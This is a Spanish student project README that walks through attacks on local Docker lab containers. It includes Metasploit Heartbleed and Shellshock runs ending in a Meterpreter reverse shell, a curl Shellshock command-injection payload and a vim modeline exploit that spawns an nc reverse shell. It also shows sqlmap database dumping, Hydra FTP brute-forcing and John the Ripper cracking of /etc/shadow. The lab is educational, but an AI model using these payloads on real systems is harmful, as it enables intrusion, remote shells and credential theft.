# Seguridad Informática


## Objetivos de este proyecto

El objetivo de este proyecto es ejemplificar mediante el uso de herramientas informáticas, la diferencia entre seguridad, privacidad y anonimato, para ello se desglosará este trabajo en tres partes, en la primera se explicaran distintas aplicaciones para realizar pentesting,utilizando para ese propósito maquinas vulnerables para ejemplificar su funcionamiento.
En la segunda parte se explicaran las distintas maneras de protegerse de estos ataques, explicando tanto maneras activas como pasivas, principamente `NIDS` y `HIDS`
En la tercera y ultima parte de este trabajo se mostrará la tipología de red básica de un enrutamiento tipo `tor` y un análisis de las distintas soluciones de proxys y VPN que existen en el mercado.

Así mismo para llevar a cabo algunas de las partes de este trabajo, se creará una estructura de contenedores, utilizando la tecnología que nos brinda `docker` de cara a obtener una maquina `host` desde donde lanzaremos las pruebas, para este supuesto utilizaremos un sistema `kali-linux` que simplemente es un `debian` vitaminado con las herramientas básicas para realizar `pentesting` y unas maquinas vulnerables alojadas en contenedores de la misma red.



## Creación del escenario de pruebas


### Creación del escenario HOST

`docker run -it joterop/kali /bin/bash`


### Creación de las maquinas vulnerables

*HeartBleed*

`docker run -d -p 8443:443 --name Contenedor_HeartB hmlio/vaas-cve-2014-0160`

*SQLi*

`docker run -d -p 80:80 --name Contenedor_SQLi tuxotron/audi_sqli`

*Bashdoor*

`docker run --name bashdoor -d hmlio/vaas-cve-2014-6271`




## NMAP//NSE

`Nmap` es un programa de código abierto, cuyo objetivo último es descubrir servidores o servicios dentro de una red informática, para ello nmap envía una serie de paquetes a la maquina destino y analiza sus respuestas, mediante el uso de scripts avanzados también llamados (Network Scripting Engine) también puede encontrar vulnerabilidades en los servicios encontrados.


## HeartBleed

En primera instancia realizamos un escaneo de puertos, para saber que servicios tiene abiertos la maquina auditada.

nmap 172.17.0.3


```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 20:20 UTC
Nmap scan report for 172.17.0.3 (172.17.0.3)
Host is up (0.000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
443/tcp open  https
MAC Address: 02:42:AC:11:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

```
vemos que existe un servicio https asociado al puerto seguro `443`, podemos intentar ejecutar scripts NSE (Nmap scripting Engine), haciendo una búsqueda en la pagina `https://nmap.org/nsedoc/index.html` podemos filtrar los distintos scripts relacionados con `https` y con `ssl` de la misma manera podemos generar un fichero con las vulnerabilidades que deseamos explorar y ejecutar un pequeño script en bash para iterar linea a linea.

```
ls /usr/share/nmap/scripts/ > scripts.txt

grep -E "http|https|ssl" scripts.txt > script.final.txt
```
usando un while -read

```
#!/bin/bash
ip=$1

while read -r line
do
  echo $line $ip
  nmap -sV --script=$line $ip
done
```
bash nmap.script.sh < scripts.final.txt 172.17.0.3 >> vulnerable.txt

Realizando este tipo de búsqueda, detectamos 2 vulnerabilidades relacionadas con la versión de `openssh` instalada en el host vulnerable, ambas relacionadas con `HeartBleed`:

```
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.55 seconds
ssl-ccs-injection.nse 172.17.0.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-12 00:20 CEST
Nmap scan report for joseclient.xjose.cat (172.17.0.3)
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224

```

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 20:18 UTC
Nmap scan report for 172.17.0.3 (172.17.0.3)
Host is up (0.000018s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt
MAC Address: 02:42:AC:11:00:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds

```


### Metasploit

Metasploit es un proyecto de código abierto para la seguridad informática , este incluye una base de datos donde se recogen exploits y vulnerabilidades de cara a ejecutarlos en una máquina remota, para este supuesto se va a utilizar la base de datos de metaspoit para ejecutar un payload que nos de acceso a los datos filtrados por el bug de heartbleed.



```
msf5 > search heartbleed

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   1  auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   2  auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

```

Usamos el modulo 1



```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOST 172.17.0.3
RHOST => 172.17.0.3
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set VERBOSE true
VERBOSE => true

```

Ejecutamos un `RUN` y leemos la info recolectada.

```
[*] 172.17.0.3:443        - Printable info leaked:
\QO>DqJo<rjqf"!98532ED/A repeated 16008 times @ repeated 16122 times @a@A]7PR2V0hCy^mRUk+udra5PjL,McNsadPfM\!rfC 71&vtjNgRXp]%_`'~(08l5^EffB4{3QhM,GMW-9SO6{ CNCA%[b4[#LI6K3B3iH(Y-=d]aDW2x#v0bz#",)$Bu!('tN{fBez|ZE,wWm@|pBb[]B'Jg00U00*H8#^WJ1q"r<1\;t">{>YY#jxxvpZOT0[HfJ%wRt@$74)vWYNUOtYcY2J\$UQtds(W=th!n`MP>>#aPb#f;DQQh=Xa\ChZ repeated 15069 times @ repeated 160 times rQ';jU :jU1(;jU8;jU repeated 3868 times VR\2ch<P$86n"!jG,$ !^tM`R8nL00GpSV0*H010Uc2712433a4da0150804213439Z250801213439Z010Uc2712433a4da0"0*H0KAK%ex_gF\;;s$_7DNKS_P4E y2+~g)^Y,;7g',EDE6Py6/,[j+BO cg;2x'%3E ij[9X)$Bu!('tN{fBez|ZE,wWm@|pBb[]B'Jg00U00*H8#^WJ1q"r<1\;t">{>YY#jxxvpZOT0[HfJ%wRt@$74)vWYNUOtYcY2J\$UQtds(W=th!n`MP>>#aPb#f;DQQh=Xa\ChZKGA]7PR2V0hCy^mRUk+udra5PjL,McNsadPfM\!rfC 71&vtjNgRXp]%_`'~(08l5^EffB4{3QhM,GMW-9SO6{ CNCA%[b4[#LI6K3B3iH(Y-=d]aDW2x#v0bz#", repeated 2693 times AN;jU`S;jUR;jU1<0y_u%bw+syU7v_1VWS\J%!]%qA@q !^tM`R8nL 03191af75903cc9fb71b948d7649cff6,2\K;jU!J;jU1J;jU1!pJ;jU12@K;jU@Q0QpQQQQQQQQQxQQQ`QQ`QXQ8QQ@QHQQhQQQxQHQQQQQ QpQQQQ(QQpQQQQQQQQQ8Q0QAM;jU@N;jUA`QM;jUYQq' M;<7AH(,A`QN;jUYQq@LU!H(,fQO;jUpP;jUe:jU3439P;jUP;jU*H0P;jU Q;jUS_PQ;jUQ;jU~gafQ`H;jUH;jU@P;jU)1|1Q%c00U!6jfx&~81">{>Y1J%wRt1)b0x! 4H021`MP>!0R;jU!Q Z;jU pPQ;jUH;jU1QQQp;jU W;jU MP 0S;jUaQQ00`];jUU;jUV;jUpV;jU`0jKF4NCV~afQ^;jU^;jU_;jU!b;jU  !8Q8Q!Y;jUQ;jU@ppQ`k;jU Aq;jU  1zxQxQ(K1ZC}H!;SyCl5%8n61ls=>x[%n@c=7qzeUy,aR;jUQ`Z;jU^;jUPZ;jUS;jUQUQ!Q i;jU 0Q_;jU0QQQqQQAT;jUQ  Q !QQ;jUP d;jU  !Q;jUQ  S;jUqQQ 0Pf;jU!U;jU`V;jU repeated 248 times po[+L"7V-7us1yRa58F3_{fR7k8a VGj9D7@tut'bo$y4$!{Y17EIL@?<1bIsgtDpDUV!Pj;jU  1Q\|sW\LOE0up;kqQh;jU!e;jUG,O1`;jUXQXQ  repeated 142 times p;jUW;jU`Z;jUgJ'B][bBp|@mWw,EZ|zeBf{Nt'(!uB$)X9[ji E3%'x2;gc OB+j[,/6yP6EDE,'g7;,Y^)g~+2y E4P_SKND7_$s;;\Fg_xe%KAKpJR[S|(Rxm=Oc3T6>x&rP 2]khcD=/ n5m)AV%4POo&^eJ3!JZ@qvB::6t:9\P3r>2?M$]-F7CKi6X;-2G2n>~vgOw\RQmxVVty-;q@{

```
![Alt Text](aux/heartbleed.gif)

La peculiaridad de este bug encontrado en 2014 era que podía exponer de manera sencilla, datos de las cookies de sesión del servidor, lo que podía abrir la puerta a ataques del tipo `man-in-the-middle`


### Metasploit - Shellshock

Shellshock o Bashdoor es un bug relacionado con Bash, dado que muchos servidores usan bash para realizar ciertas tareas, el atacante podía ejecutar comandos arbitrarios a través de shell, debido a un escalado de privilegios.


En el docker tenemos una versión de bash no parcheada, que permite que ejecutar ordenes a través de scripts escritos en bash alojados en la carpeta `cgi-bin` del directorio de apache.

Veremos como atacar esta maquina mediante el uso de `Metasploit` y con un simple `curl`



```
msf5 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   1   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   2   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   4   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   5   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   8   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   9   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   10  exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   11  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   12  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)


```

usamos el modulo 6

```
msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 172.17.0.2
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost 172.17.0.3
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/stats
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp

```
Configuramos los parámetros necesarios, el tipo de `payload` que usaremos, así como la dirección a la que atacaremos.

```
[*] Started reverse TCP handler on 172.17.0.3:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (985320 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.3:4444 -> 172.17.0.2:57724) at 2019-05-22 20:19:48 +0000
```

Hemos creado una conexión interactiva con el `shell` remoto.

```
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

meterpreter > ps

Process List
============

 PID  PPID  Name        Arch    User      Path
 ---  ----  ----        ----    ----      ----
 1    0     apache2ctl  x86_64  root      .
 15   1     apache2     x86_64  root      .
 16   15    apache2     x86_64  www-data  .
 17   15    apache2     x86_64  www-data  .
 18   15    apache2     x86_64  www-data  .
 171  16    stats       x86_64  www-data  /bin
 172  171   stats       x86_64  www-data  /bin
 173  172   BmJNt       x86     www-data  /tmp

```
![Alt Text](aux/shellshock.gif)

De esta manera conseguimos acceso a una maquina remota, con una versión de `bash` no actualizada,

Utilizando la herramienta `curl`, también podemos conseguir un resultado similar.

```
root@3bdc61718de1:/# curl -A "() { no sabes nada jhon snow; }; echo; /bin/bash -c 'cat /etc/passwd';" http://172.17.0.2:80/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

```
![Alt Text](aux/shellshock-curl.gif)
También podemos usarlo para enviar una cantidad de pings a una ordenador remoto.

```

root@3bdc61718de1:/# curl -A "() { no sabes nada jhon snow; }; echo; /bin/bash -c 'ping -s 100 192.168.130';" http://172.17.0.2:80/cgi-bin/stats

```

### CVE's

El uso de Metasploit para atacar vulnerabilidades es sencillo, fácil y para todos los usuarios, no obstante a medida que indagas en estos temas, te das cuenta de que metasploit es simplemente una base de datos que permite a los usuarios con un nivel medio/ bajo aprovecharse de estas vulnerabilidades, desde el punto de vista de un administrador de sistemas, es mucho mas eficaz intentar estar al día con los CVE *Common Vulnerabilities and Exposures* de cara a mantener el sistema con las actualizaciones criticas necesarias, dado que incluso paquetes tan triviales como `vim` pueden exponer a nuestra máquinas a ataques remotos.
Esta vulnerabilidad es bastante reciente así que animo al centro a que actualice sus editores de texto, el 11/06/2019 el señor `@rawsec` dio a conocer a la comunidad vulnerabilidades en los paquetes vim/neovim relacionados con los `modelines` de estos editores (son opciones de lanzamiento, algunas se ejecutan sin mas, y otras se ejecutan en un `sandbox` para evitar problemas de seguridad).

#### Prueba de concepto

Creamos un archivo y le pasamos las siguientes opciones ( tenemos el `modeline` activado..)


```
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

```
Ejecutamos el archivo con un vim...

```
[vkk@192 Escritorio]$ vi poc.txt

Linux 192.168.1.132 4.19.15-300.fc29.x86_64 #1 SMP Mon Jan 14 16:32:35 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Pulse INTRO o escriba una orden para continuar

```

Quizás nos pueda parecer algo extraño pero no terminal, hasta que obtenemos una `shell` inversa a través de este procedimiento, saltándonos el `sandbox` del editor.

```
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n


```

![Alt Text](aux/shell-reverse.gif)



### SQLMAP
Sqlmap es una herramienta de código abierto, programada en python que tiene como finalidad última analizar vulnerabilidades del tipo `sqlinyection`
Para este supuesto usaremos la máquina vulnerable `tuxotron/audi_sqli`, intentaremos encontrar las vulnerabilidades del tipo `sql-inyection` a las que es susceptible.


#### Recolección de información

Usando Nmap vemos que tiene tanto el puerto 80 como el 3306 abierto, http + mysql

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 11:18 CEST
Nmap scan report for 172.17.0.4 (172.17.0.4)
Host is up (0.000056s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 02:42:AC:11:00:04 (Unknown)

```
#### Ejecución del script sqlmap

**sqlmap -u http://172.17.0.4/Less-1/?id=1**

```
[*] starting @ 09:33:13 /2019-05-13/

[09:33:13] [INFO] resuming back-end DBMS 'mysql'
[09:33:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9242=9242 AND 'PgRR'='PgRR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1536 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(1536=1536,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kIny'='kIny

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'wScb'='wScb

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7376' UNION ALL SELECT NULL,CONCAT(0x71626b7a71,0x74595967466e6676496f627a6649737665705268637679706c6f7a704e6352487a4975724f456f47,0x716a7a7171),NULL-- LYBh
---
[09:33:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[09:33:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/172.17.0.4'

[*] ending @ 09:33:14 /2019-05-13/

```

Como se aprecia en el texto anterior, la utilidad sqlmap ha encontrado los diferentes exploits o fallos, relacionados con la url introducida en el script, también podemos tener acceso a las bases de datos detrás de la pagina web.

**sqlmap -u http://172.17.0.4/Less-1/?id=1 --dbs**


```
[09:42:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[09:42:00] [INFO] fetching database names
[09:42:00] [WARNING] the SQL query provided does not return any output
[09:42:00] [INFO] used SQL query returns 5 entries
[09:42:00] [INFO] resumed: 'information_schema'
[09:42:00] [INFO] resumed: 'challenges'
[09:42:00] [INFO] resumed: 'mysql'
[09:42:00] [INFO] resumed: 'performance_schema'
[09:42:00] [INFO] resumed: 'security'
available databases [5]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security

[09:42:00] [INFO] fetched data logged to text files under '/root/.sqlmap/output/172.17.0.4'

[*] ending @ 09:42:00 /2019-05-13/

```

Para tener acceso a los contenidos de las tablas de la BBDD se puede usar el siguiente comando


**sqlmap -u http://172.17.0.4/Less-1/?id=1 -D security --tables**

```
[09:52:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[09:52:16] [INFO] fetching tables for database: 'security'
[09:52:16] [WARNING] the SQL query provided does not return any output
[09:52:16] [INFO] used SQL query returns 4 entries
[09:52:16] [INFO] retrieved: 'emails'
[09:52:16] [INFO] retrieved: 'referers'
[09:52:16] [INFO] retrieved: 'uagents'
[09:52:16] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[09:52:16] [INFO] fetched data logged to text files under '/root/.sqlmap/output/172.17.0.4'

[*] ending @ 09:52:16 /2019-05-13/

```

Finalmente para leer el contenido de esas tablas podemos hacer un dump

**sqlmap -u http://172.17.0.4/Less-1/?id=1 -D security -T emails --dump**

```
[09:54:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[09:54:39] [INFO] fetching columns for table 'emails' in database 'security'
[09:54:39] [WARNING] the SQL query provided does not return any output
[09:54:39] [INFO] used SQL query returns 2 entries
[09:54:39] [INFO] retrieved: 'id'
[09:54:39] [INFO] retrieved: 'int(3)'
[09:54:39] [INFO] retrieved: 'email_id'
[09:54:39] [INFO] retrieved: 'varchar(30)'
[09:54:40] [INFO] fetching entries for table 'emails' in database 'security'
[09:54:40] [WARNING] the SQL query provided does not return any output
[09:54:40] [INFO] used SQL query returns 8 entries
[09:54:40] [INFO] retrieved: 'Dumb@dhakkan.com'
[09:54:40] [INFO] retrieved: '1'
[09:54:40] [INFO] retrieved: 'Angel@iloveu.com'
[09:54:40] [INFO] retrieved: '2'
[09:54:40] [INFO] retrieved: 'Dummy@dhakkan.local'
[09:54:40] [INFO] retrieved: '3'
[09:54:40] [INFO] retrieved: 'secure@dhakkan.local'
[09:54:40] [INFO] retrieved: '4'
[09:54:40] [INFO] retrieved: 'stupid@dhakkan.local'
[09:54:40] [INFO] retrieved: '5'
[09:54:40] [INFO] retrieved: 'superman@dhakkan.local'
[09:54:40] [INFO] retrieved: '6'
[09:54:40] [INFO] retrieved: 'batman@dhakkan.local'
[09:54:40] [INFO] retrieved: '7'
[09:54:40] [INFO] retrieved: 'admin@dhakkan.com'
[09:54:40] [INFO] retrieved: '8'
Database: security
Table: emails
[8 entries]
+----+------------------------+
| id | email_id               |
+----+------------------------+
| 1  | Dumb@dhakkan.com       |
| 2  | Angel@iloveu.com       |
| 3  | Dummy@dhakkan.local    |
| 4  | secure@dhakkan.local   |
| 5  | stupid@dhakkan.local   |
| 6  | superman@dhakkan.local |
| 7  | batman@dhakkan.local   |
| 8  | admin@dhakkan.com      |
+----+------------------------+

[09:54:40] [INFO] table 'security.emails' dumped to CSV file '/root/.sqlmap/output/172.17.0.4/dump/security/emails.csv'
[09:54:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/172.17.0.4'

[*] ending @ 09:54:40 /2019-05-13/

```
Para extraer las diferentes columnas de una tabla podemos ejecutar

**sqlmap -u http://172.17.0.4/Less-1/?id=1 -D security -T emails --columns**

![Alt Text](aux/sqlmap.gif)

### Wireshark

Wireshark es una herramienta de código libre, cuya principal función es analizar los paquetes generados por el tráfico de red, dándonos de esa manera información sobre las comunicaciones y sus protocolos.
En este trabajo se usa wireshark para analizar el trafico generado por `sqlmap` cuando este se conecta a un servidor.

![Captura Wireshark](aux/trafico-sqlmap.png)


Tal y como se aprecia en la captura anterior, nos encontramos con distintas pautas, sabemos que se trata de una petición `GET` y que tiene un `User-Agent` llamado `sqlmap`, obviamente un atacante experimentado, usará un `random user agent`, para evitar que su trafico sea desestimado por cualquier `NIDS` que este monitorizando el tráfico de red.


## Hydra

Otra de las utilidades estrella de `kalilinux` es `Hydra`, una utilidad capaz de realizar ataques de fuerza bruta para encontrar combinaciones de `login:passwd` para escenificar el uso de esta aplicación se ha creado un `docker` con un servidor `ftp` en el cual hemos creado distintos usuarios, existen dos maneras de usarlos, usando diccionarios propios o prestados, y usando la fuerza bruta.

```
root@3bdc61718de1:/# hydra -L users.txt -P passlist.txt ftp://172.17.0.2

con la opción -L le pasamos una lista de usuarios y con la opción -P una lista de passwords, para que itere las combinaciones.


[DATA] max 16 tasks per 1 server, overall 16 tasks, 198 login tries (l:11/p:18), ~13 tries per task
[DATA] attacking ftp://172.17.0.2:21/
[21][ftp] host: 172.17.0.2   login: jose   password: jose
[21][ftp] host: 172.17.0.2   login: roberto   password: roberto
[21][ftp] host: 172.17.0.2   login: raul   password: raul
1 of 1 target successfully completed, 3 valid passwords found


```

**Opción fuerza bruta**

Existe la opción de crear una combinación de caracteres para iniciar un ataque basado en el uso de la fuerza bruta, la sintaxis de dicho ataque es sencilla.


```

-x 1:3:[] el primer y segundo número indican la longitud mínima y máxima de la combinación  de caracteres creada, y la tercera indica el tipo de caracteres, podemos usar "/", "1", "a", "A" para indicar números, mayúsculas o minúsculas, incluso slashes.


```
Como vemos el uso de la fuerza bruta, es lento, encontrar una contraseña alfabética, de 4 caracteres puede requerir mucho tiempo, incluso aumentado el numero de hilos con la opcion `-t 64`

```
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5227794 login tries (l:11/p:475254), ~81685 tries per task
[DATA] attacking ftp://172.17.0.2:21/
[STATUS] 2297.00 tries/min, 2297 tries in 00:01h, 5225626 to do in 37:55h, 64 active


```


![Alt Text](aux/hydra.gif)

## Jhon the Ripper


`Jhone de Ripper` es una utilidad que aglutina un conjunto de algoritmos de crackeo, capaz de hacer frente, con mayor o con menor éxito los siguientes formatos, traditional DES-based, "bigcrypt", BSDI extended DES-based, FreeBSD MD5-based  and OpenBSD Blowfish-based, Kerberos/AFS and Windows LM (DES-based) hashes, DES-based tripcodes, SHA-crypt hashes (Fedora y Ubuntu), para demostrar el uso y la funcionalidad de esta utilidad, se ejecutaran los ejemplos recogidos en su documentación https://www.openwall.com/john/doc/EXAMPLES.shtml


Para comenzar con la prueba creamos a 3 usuarios del sistema

```
jose:12345678
pere:pere
marta:qwerty
```
realizamos una copia del fichero `/etc/shadow` y le pasamos la utilidad `unshadow`

```
unshadow /etc/passwd /etc/shadow > my_list_passwd

```
usando la orden `john my_list_passwd`

```
john my_list_passwd
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA512"
Use the "--format=HMAC-SHA512" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 16
needed for performance.
pere             (pere)
Warning: Only 9 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 12 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 9 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 14 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 11 candidates buffered for the current salt, minimum 16
needed for performance.
Warning: Only 10 candidates buffered for the current salt, minimum 16
needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings in the future, enable 'RelaxKPCWarningCheck'
in john.conf
Almost done: Processing the remaining buffered candidate passwords, if any
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
qwerty           (marta)
12345678         (jose)
3g 0:00:00:01 DONE 2/3 (2019-05-22 11:10) 1.714g/s 1251p/s 1545c/s 1545C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed

```
usando `jhon my_list_passwd --show`

```
root@3bdc61718de1:/# john my_list_passwd --show  
jose:12345678:1000:1000::/home/jose:/bin/sh
pere:pere:1001:1001::/home/pere:/bin/sh
marta:qwerty:1002:1002::/home/marta:/bin/sh

```

